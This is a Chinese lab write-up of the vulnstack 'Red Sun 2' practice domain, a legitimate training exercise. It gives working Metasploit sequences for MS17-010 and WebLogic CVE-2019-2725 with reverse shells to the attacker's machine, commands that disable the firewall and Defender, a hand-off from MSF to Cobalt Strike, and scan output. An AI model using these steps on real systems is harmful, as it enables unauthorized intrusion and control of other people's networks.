红日靶场2

靶场搭建

1. 官网下载

1	http://vulnstack.qiyuanxuetang.net/vuln/detail/3/

2. Vmware导入、配置IP

解压 -> 导入vmware

所有的密码都是1qaz@WSX

这里的WEB这台机子需要恢复快照到v1.3版本，否则进不去

配置IP

因为我kali的ip为192.168.197.142

所以把WEB和PC这两台配置为192.168.197.80 \ 192.168.197.201即可

最后在WEB这台用路径

1	C:\Oracle\Middleware\user_projects\domains\base_domain

以管理员的身份点击startWebLogic启动WebLogic服务

完成配置！

外网打点

1	nmap -P 192.168.197.80

这里发现了80,445,1433,3389,7001等特殊端口

80端口

访问80端口，发现没有什么东西，dirsearch也没扫出什么来

445端口

直接上msf进行ms17_010

search ms17_010
use 3
set rhosts 192.168.197.80
run

use 0
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.197.80
set target 3
run

发现失败了

以上帝视角查看是被防火墙拦截了

7001端口-Weblogic

使用工具

1	https://github.com/dr0op/WeblogicScan

发现存在java的反序列化漏洞，那就上另一个

1
2
3

https://github.com/shack2/javaserializetools/releases/

java -jar Java反序列化漏洞利用工具V1.7.jar

CVE-2019-2725利用成功，那么尝试冰蝎传个马上去试一试

发现上传成功，尝试连接

发现通过冰蝎的反弹shell到msf不太习惯也用不太来，还是直接msf直接用CVE-2019-2725反序列化打把

search CVE-2019-2725
use 0
set lhost 192.168.197.142
set lport 5555
set rhosts 192.168.197.80
set target 1
run

内网渗透

信息搜集

发现进去只是admin，尝试getsystem发现不成功

getuid		#admin
getsystem	#fail
ps			#查看进程
migrate	id	#id为一个system的id
getuid		#system

第一件事就是关闭防火墙
shell
chcp 65001
netsh advfirewall show allprofiles state
netsh adcfirewall set allprofiles state off
net stop defender

1
2
3

tasklist 

#复制进程到这里看 https://saucer-man.com/avlist/index.html

ipconfig /all
#发现存在域以及发现了dns server(一般域控在dns server上)
两个网段
10.10.10.0/24
192.168.197.0/24

1	systeminfo

1
2
3

找域控还可以通过
net time /domain
ping xxxx

MSF->CS

内网的遨游不玩CS就像游戏不玩元神

cs上建立监听会话（该图片是已经建立好的会话）

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set session （id）
set lport 8080 (cs和msf一致)
run

成功上线CS

坑点

1	当我想net view的时候，进行了报错6118

去DC那台机子

win+R
services.msc
computer broswer 启动
然后在PC机上先关闭防火墙，然后三台net view
# 然后等一会，在三台机子上试一试net view 发现都成功

继续探索

mimikatz

mimikatz

无脑继续上一波fscan

start infoscan
(icmp) Target '10.10.10.10' is alive
(icmp) Target '10.10.10.80' is alive
(icmp) Target '10.10.10.201' is alive
icmp alive hosts len is: 3
10.10.10.201:139 open
10.10.10.80:139 open
10.10.10.80:80 open
10.10.10.80:1433 open
10.10.10.201:445 open
10.10.10.10:445 open
10.10.10.10:139 open
10.10.10.201:135 open
10.10.10.80:135 open
10.10.10.10:135 open
10.10.10.80:7001 open
10.10.10.10:88 open
10.10.10.80:445 open

[09/21 07:19:34] [+] received output:
alive ports len is: 13
start vulscan
[+] 10.10.10.80	MS17-010	(Windows Server 2008 R2 Standard 7601 Service Pack 1)
NetInfo:
[*]10.10.10.10
   [->]DC
   [->]10.10.10.10
[*] WebTitle:http://10.10.10.80:7001   code:404 len:1164   title:Error 404--Not Found

[09/21 07:19:34] [+] received output:
[*] 10.10.10.80          DE1AY\WEB               Windows Server 2008 R2 Standard 7601 Service Pack 1
NetInfo:
[*]10.10.10.201
   [->]PC
   [->]10.10.10.201
   [->]192.168.197.201
[+] 10.10.10.10	MS17-010	(Windows Server 2012 R2 Standard 9600)
[*] WebTitle:http://10.10.10.80        code:200 len:0      title:None
[*] 10.10.10.10    [+]DC __MSBROWSE__\DC                Windows Server 2012 R2 Standard 9600
[+] 10.10.10.201	MS17-010	(Windows 7 Ultimate 7601 Service Pack 1)
[+] InfoScan:http://10.10.10.80:7001   [weblogic] 

[09/21 07:19:34] [+] received output:
[*] 10.10.10.201         DE1AY\PC                Windows 7 Ultimate 7601 Service Pack 1

[09/21 07:19:34] [+] received output:
[+] http://10.10.10.80:7001 poc-yaml-weblogic-cve-2017-10271
[+] http://10.10.10.80:7001 poc-yaml-weblogic-cve-2020-14750

[09/21 07:19:39] [+] received output:
宸插畬鎴� 16/16
scan end